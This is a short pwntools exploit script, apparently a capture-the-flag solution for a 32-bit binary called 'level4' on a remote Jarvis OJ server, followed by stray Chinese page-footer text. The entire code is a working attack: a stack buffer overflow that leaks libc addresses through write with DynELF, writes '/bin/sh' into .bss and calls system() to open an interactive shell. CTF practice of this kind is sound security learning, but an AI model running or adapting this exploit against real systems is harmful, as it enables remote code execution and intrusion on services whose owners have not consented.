#!/usr/bin/env python
from pwn import *
elf = ELF('level4')
write_plt = p32(elf.symbols['write'])
start_addr = p32(elf.symbols['_start'])
read_plt = p32(elf.symbols['read'])
data_addr = p32(elf.symbols['__bss_start'])
junk = "A" * (0x88 + 4)
Io = remote("pwn2.jarvisoj.com", 9880)
def leak(addr):
payload = junk + write\_plt + start\_addr + p32(1) + p32(addr) + p32(4)
Io.send(payload)
leaked = Io.recv(4)
print "\[%s\] -> \[%s\] = \[%s\]" % (hex(addr), hex(u32(leaked)), repr(leaked))
return leaked
d = DynELF(leak, elf=ELF("./level4"))
system_addr = d.lookup('system', 'libc')
print "[system()] -> [%s]" % (hex(system_addr))
payload = junk + read_plt + start_addr + p32(0) + data_addr + p32(8)
Io.send(payload)
Io.send("/bin/sh\x00")
#read_output()
payload = junk + p32(system_addr) + p32(0xFFFFFFFF) + data_addr
Io.send(payload)
Io.interactive()
手机扫一扫
移动阅读更方便
你可能感兴趣的文章